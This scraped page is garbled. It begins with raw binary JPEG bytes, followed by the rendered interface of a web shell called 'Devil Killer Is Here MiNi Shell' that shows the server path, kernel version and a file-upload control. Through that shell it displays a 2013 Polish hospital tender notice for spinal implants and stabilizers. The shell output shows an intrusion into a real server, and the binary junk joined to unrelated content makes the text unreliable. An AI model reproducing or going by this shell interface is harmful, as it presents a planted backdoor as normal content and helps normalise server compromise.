JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131115/466580-N-2013.html

<p class="kh_header"><b>Włocławek: ZP - 51 - 2013, DOSTAWA IMPLANTÓW I STABILIZATORÓW</b><br>
<b>Numer ogłoszenia: 466580 - 2013; data zamieszczenia: 15.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny we Włocławku , Ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 412 94 13, faks 54 412 94 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP - 51 - 2013, DOSTAWA IMPLANTÓW I STABILIZATORÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa implantów i stabilizatorów wraz z dostawą narzędzi do każdego systemu na zasadzie użyczenia, przez okres 12 miesięcy licząc od dnia zawarcia umowy na zasadzie zapasu konsygnacyjnego w następującym asortymencie: 

Pakiet 1
L.p.	Nazwa asortymentu-parametry	Ilość kompletów 35 + 7 kompletów - wg prawa opcji (dodatkowa do gwarantowanej-fakultatywna)
1.	STABILIZACJA DYNAMICZNA MIĘDZYWYROSTKOWA
W ODCINKU LĘDŹWIOWYM.
Implant do mocowania między wyrostkami kolczystymi kręgów. Komplet stanowi wyprofilowany korpus, którego główny blok współpracuje z elastyczną taśmą poliestrową oraz klips zaciskający taśmę. Typoszereg rozmiarowy korpusu: 8, 10, 12, 14, 16 mm. Implant posiadający ramiona stałe oraz ruchome, które po rozłożeniu tworzą tzw. (kołyskę), obejmując wyrostek kolczysty. Dostęp jednostronny, przy zachowaniu więzadła nadkolcowego. 
Komplet: 1 korpus z polimeru PEEK, 1 taśma poliestrowa, 1 tytanowy klips zabezpieczający.
Zamawiający wymaga aby Wykonawca przez okres 12 miesięcy zagwarantował zapas konsygnacyjny 5 szt. kompletów.
Pakiet 2
L.p.	Nazwa asortymentu-parametry	Ilość kompletów 3 + 1 komplet - wg prawa opcji (dodatkowa do gwarantowanej-fakultatywna)
1.	STABILIZACJA SZCZYTOWO - POTYLICZNA - MATERIAŁ: TYTAN.
Mocowanie w potylicy oraz w masywach bocznych kręgosłupa szyjnego za pomocą specjalnych kotwic (3 długości wymiarowe), haków szyjnych lub śrub szyjnych wieloosiowych. Haki dostosowane do odcinka C1-C2 oraz C3-C7, możliwość zastosowania haków potylicznych i podpotylicznych. Osadzanie pręta od góry, blokowanie prętów w kotwicach, hakach i śrubach wieloosiowych za pomocą jednego elementu mocującego. Pręty dopasowane anatomicznie do pogranicza potyliczno-szyjnego o długościach w odcinku szyjnym od 50 do 160 ze skokiem co 10 mm, a w odcinku potylicznym od 30-40 mm ze skokiem co 5 mm (w zestawie dostępne pręty do odcinka szyjnego). Łączniki poprzeczne w zakresie długości 35-65 mm stopniowane co 5 mm, składające się z pręta poprzecznego oraz dwóch zaczepów hakowych.
Komplet: 2 elementy do odcinka potylicznego (kotwice-haki) i 4 elementy do odcinka szyjnego (kotwice-haki-śruby wieloosiowe), 2 pręty potyliczno-kręgosłupowe, 1 łącznik poprzeczny.  
Zamawiający wymaga aby Wykonawca przez okres 12 miesięcy zagwarantował zapas konsygnacyjny 1 szt. kompletu.
Pakiet 3
L.p.	Nazwa asortymentu-parametry	 Ilość kompletów 35 + 7 kompletów - wg prawa opcji (dodatkowa do gwarantowanej-fakultatywna)
1.	STABILIZACJA MIĘDZYTRZONOWA ODCINKA SZYJNEGO - MATERIAŁ: PEEK
Wsuwana proteza dysku szyjnego. Dostosowana do anatomii i fizjologii odcinka szyjnego kręgosłupa. Kształt odzwierciedlający obrys trzonu. Proteza posiadająca karbowane płaszczyzny górne i dolne stykające się z trzonami, zabezpieczające przed przesuwaniem i dyslokacją, dodatkowo wyposażone w 4 -kolce-tytanowe, pełniące jednocześnie rolę znaczników-markerów radiologicznych, zapewniające dodatkowe zakotwiczenie w blaszkach granicznych trzonów. Protezy w kilku rodzajach wykonania obejmując w danym rodzaju pełny typoszereg wymiarowy od 4 do 10 mm. Dyski dostępne z prostymi płaszczyznami, jednostronnie wypukłe, obustronnie wypukłe-klinowe. Proteza musi umożliwiać połączenie z płytką szyjną za pomocą szybkozłącza śrubowego. 
Komplet: 1 klatka na operowany poziom.
Zamawiający wymaga aby Wykonawca przez okres 12 miesięcy zagwarantował zapas konsygnacyjny 5 szt. kompletów.
Pakiet 4
L.p.	Nazwa asortymentu-parametry	Ilość kompletów 15 + 3 komplety - wg prawa opcji (dodatkowa do gwarantowanej-fakultatywna)
1.	STABILIZACJA TRANSPEDIKULARNA KRÓTKOODCINKOWA ODCINKA PIERSIOWO-LĘDŹWIOWEGO - MATERIAŁ: TYTAN.
-śruby transpedikularne z długimi ramionami (w tym repozycyjne) jedno i wieloosiowe cylindryczne z gwintem na całej długości i stożkowym rdzeniem;
-średnice śrub 5.0mm, 6.0mm, 7.0mm; 
-długości 30-65mm ze stopniowaniem co 5mm; 
-średnica łba śruby wraz z blokerem poniżej 12mm;
-wysokość łba śruby wystająca ponad pręt poniżej 5mm;
-jednoelementowy bloker zintegrowany z obejmami zapobiegającymi rozchylaniu się ramion śruby;
-możliwość wprowadzenia pręta w gniazdo śruby bez konieczności dopychania dodatkowym narzędziem;
-pręty osadzane w śrubie wyłącznie od góry (patrząc z punktu widzenia operatora);
-konstrukcja śruby umożliwiająca wprowadzenie i blokowanie wygiętego w płaszczyźnie stabilizacji pręta (do 10o); 
-pręty o średnicy 6.0mm w zakresie długości od 40-460mm ze skokiem co 10mm, posiadające zakończenia sześciokątne umożliwiające derotację śródoperacyjną;
-łącznik poprzeczny w postaci pręcika i dwóch zaczepów hakowych mocowany na prętach, w zakresie długości 35 do 85 mm;
-instrumentarium i implanty umiejscowione na tacach i w kontenerach umożliwiających ich przechowywanie i sterylizację. Taca na implanty wyposażona w specjalną miarkę umożliwiającą szybkie określenie średnicy i długości śrub. 
Komplet: 4 śruby transpedikularne,2 pręty kręgosłupowe, 1 stabilizator poprzeczny.
Zamawiający wymaga aby Wykonawca przez okres 12 miesięcy zagwarantował zapas konsygnacyjny 5 szt. kompletów.
Pakiet 5
L.p.	Nazwa asortymentu-parametry	Ilość kompletów 10 + 2 komplety - wg prawa opcji (dodatkowa do gwarantowanej-fakultatywna)
1.	STABILIZACJA ODCINKA SZYJNEGO Z DOSTĘPU PRZEDNIEGO - MATERIAŁ: TYTAN
Płyty tytanowe do stabilizacji jedno i wielosegmentarnej w zakresie od 20-110mm, ze skokiem co 2,5mm. Płytka dostosowana do anatomii kręgosłupa szyjnego. Śruby z możliwością wielokierunkowego ustawienia w stosunku do płyty. Dwie śruby jednocześnie blokowane z płytką przez obrót tzw. (śmiała) o 90 stopni. Śruby jednokorówkowe i dwukorówkowe, samotnące. Wymagane 3 średnice śrub w zakresie 3,5 - 4,5mm i długości w zakresie 14-20mm, ze skokiem co 2mm. 
Komplet: 1 płytka, 4 śruby.
Zamawiający wymaga aby Wykonawca przez okres 12 miesięcy zagwarantował zapas konsygnacyjny 5 szt. kompletów.	
Pakiet 6
L.p.	Nazwa asortymentu-parametry	Ilość kompletów 3 + 1 komplet - wg prawa opcji (dodatkowa do gwarantowanej-fakultatywna)
1.	PROTEZA TRZONÓW SZYJNEGO ODCINKA KRĘGOSŁUPA -MATERIAŁ: TYTAN - STAŁA.
Implant służący do protezowania trzonów odcinka szyjnego kręgosłupa z dojścia przedniego wykonany ze stopu tytanu. Proteza w postaci perforowanego walca pustego w środku. Proteza w zakresie średnic D10, 12, 14 mm i w zakresie wysokość od 10 do 70 mm ze skokiem co 2,5 mm.
Komplet: 1 proteza trzonu.
Zamawiający wymaga aby Wykonawca przez okres 12 miesięcy zagwarantował zapas konsygnacyjny 2 szt. kompletów.
UWAGA:
1. Zamawiający wymaga wraz z dostawą implantów i stabilizatorów użyczenia narzędzi na okres trwania umowy, czego koszt ma zostać wkalkulowany w koszty pakietu.
2. W ramach realizacji przedmiotu zamówienia, Wykonawca zobowiązuje się do przeprowadzenia niezbędnych szkoleń personelu medycznego Zamawiającego w ramach umowy. 
3. Nie dopuszcza się składania ofert wariantowych.
4. Dopuszcza się składanie ofert częściowych na poszczególne pakiety. 
5. Oferowany przedmiot zamówienia musi być dopuszczony do obrotu i do używania zgodnie
z ustawą o wyrobach medycznych z dnia 20 maja 2010 r. (Dz. U. Nr 107, poz. 679 ze zm.) w
formie wpisu/zgłoszenia/powiadomienia do Rejestru Wyrobów Medycznych.
6. Zamawiający wymaga złożenia do oferty oświadczenia, że przedmiot zamówienia posiada
oznaczenie znakiem CE.
7. Zamawiający wymaga dokonania każdej dostawy przedmiotu zamówienia w terminie do 5 dni roboczych od daty złożenia zamówienia przez zamawiającego telefonicznie lub faksem - przechowywanym przez miesiąc od czasu uzyskania prawidłowo zrealizowanego zamówienia.
8. Wykonawca musi zagwarantować dostępność oferowanego przedmiotu zamówienia przez 
cały okres obowiązywania umowy.
9. Zamawiający przewiduje możliwość zwiększenia zamówienia, o którym mowa w art. 34 
ust. 5 uPzp do 20% wartości zamówienia podstawowego ( prawo opcji ). 
10. Zamawiający wymaga dołączenia instrukcji składowania zapasu konsygnacyjnego.
11. UWAGA: W Formularzu asortymentowo - cenowym w pozycji -Producent i nazwa handlowa-Producent i nr katalogowy - w przypadku, gdy numer katalogowy nie jest stosowany należy podać symbol, bądź skrót pozwalający na jednoznaczną identyfikację danego produktu, który mógłby być stosowany do zamówień w przypadku zawarcia umowy z wybranym Wykonawcą.
12. Oferowane produkty muszą posiadać aktualne pozwolenia na dopuszczenie do obrotu i używania zgodnie z obowiązującymi przepisami prawa.
UWAGA: W Formularzu asortymentowo - cenowym w pozycji -Nazwa i nr dokumentu dopuszczającego do obrotu- należy opisać dokument, natomiast w przypadku asortymentu niewymagającego takiego dopuszczenia należy wpisać (Nie wymaga dopuszczenia). 
13. Dostarczony przedmiot zamówienia winien być zaopatrzony w etykietę handlową sporządzoną w języku polskim, zawierającą niezbędne informacje potrzebne do bezpiecznego używania dla bezpośredniego użytkownika. Jeśli oryginalna dokumentacja jest sporządzona w innym języku, to Wykonawca dostarczy wraz z oryginałem tłumaczenie na język polski..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.16.20-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy ( zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek Zamawiający uzna za spełniony jeżeli Wykonawca wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 dostawę implantów i stabilizatorów o wartości minimum:
Pakiet 1 -  32 000,00 zł brutto,
Pakiet 2 --    6 000,00 zł brutto.
Pakiet 3 --  16 000,00 zł brutto,
Pakiet 4 --  19 000,00 zł brutto,
Pakiet 5 --    5 000,00 zł brutto,
Pakiet 6 --    1 300,00 zł brutto.
w ramach jednego kontraktu - odpowiednio w każdym pakiecie.

Oceny spełniania tego warunku Zamawiający dokona na podstawie dokumentu wykazu wykonanych, a w przypadku świadczeń okresowych i ciągłych, również wykonywanych głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie (zał. nr 6 do siwz) oraz dowodów, czy zostały wykonane lub są wykonywane należycie oraz oświadczenia Wykonawcy ( zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy (zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy (zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy (zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.    aktualne dokumenty potwierdzające, że oferowany przedmiot zamówienia jest
dopuszczony do obrotu i do używania zgodnie z ustawą o wyrobach medycznych z dnia 20
maja 2010 r. (Dz. U. Nr 107, poz. 679 ze zm.) w formie wpisu-zgłoszenia-powiadomienia do
Rejestru Wyrobów Medycznych - załączyć do oferty.
2.	oświadczenie, że przedmiot zamówienia posiada oznaczenie znakiem CE - załączyć 
do oferty.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Wykonawcy składający ofertę wspólnie, na podstawie art. 23 uPzp (dotyczy m.in. spółki cywilnej i tzw. konsorcjum), zobowiązani są, poza dokumentami wymienionymi wyżej, do złożenia dokumentu ustanawiającego pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wymagania zawarte w niniejszej specyfikacji dotyczące (wykonawcy) w zakresie obowiązku złożenia stosownych oświadczeń i dokumentów stosuje się odpowiednio do wszystkich wykonawców składających ofertę wspólnie. Jeżeli oferta wykonawców, składających ofertę wspólnie zostanie wybrana, zamawiający może przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców. 
2.  Pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów rejestracyjnych) w przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów rejestracyjnych. Pełnomocnictwo należy złożyć w oryginale lub w formie kopii poświadczonej za zgodność przez notariusza.
3. Pisemnego zobowiązania innych podmiotów do udostępnienia określonych zasobów na zasadach określonych w art. 26 ust. 2 b uPzp - dotyczy, gdy Wykonawca korzysta z powyższej możliwości.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony przewidują możliwość istotnych zmian umowy w stosunku do treści oferty w przypadku, gdy:
1)	nastąpi obniżenie ceny;
2)	nastąpi zmiana stawki podatku VAT - Zamawiający dopuszcza możliwość wzrostu cen jednostkowych brutto w przypadku zmiany stawki podatku od towarów i usług VAT. Zmiana cen brutto związana ze zmianą stawki podatku VAT może nastąpić najwcześniej z dniem wejścia w życie aktu prawnego wprowadzającego zmianę stawki podatku VAT, z uwzględnieniem obowiązujących regulacji;
3)	nastąpią zmiany osób wskazanych przez strony do realizacji umowy;
4)	nastąpi zmiana numeru katalogowego nie powodująca zmiany przedmiotu umowy.
2. Zamawiający dopuszcza także w szczególnych sytuacjach i za jego pisemną zgodą w trakcie trwania umowy zmianę przedmiotu umowy dostarczanego przez Wykonawcę, w szczególności w sytuacji gdy zaprzestano lub zawieszono produkcję danego towaru objętego umową, na inny towar o parametrach nie gorszych niż opisane w SIWZ, przy czym cena tego towaru zamiennego nie może przekraczać ceny towaru, na który została podpisana umowa. W przypadku zaprzestania lub zawieszenia produkcji towaru objętego umową Wykonawca winien udokumentować ten fakt.
3. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem ich nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny
im. błogosławionego księdza Jerzego Popiełuszki we Włocławku
ul. Wieniecka 49, kod pocztowy : 87-800 Włocławek
(budynek administracji, pokój nr 304).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2013 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny we Włocławku, ul. Wieniecka 49, kod pocztowy 87-800 Włocławek (budynek administracji, pokój nr 304).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1
STABILIZACJA DYNAMICZNA MIĘDZYWYROSTKOWA W ODCINKU LĘDŹWIOWYM..</p>
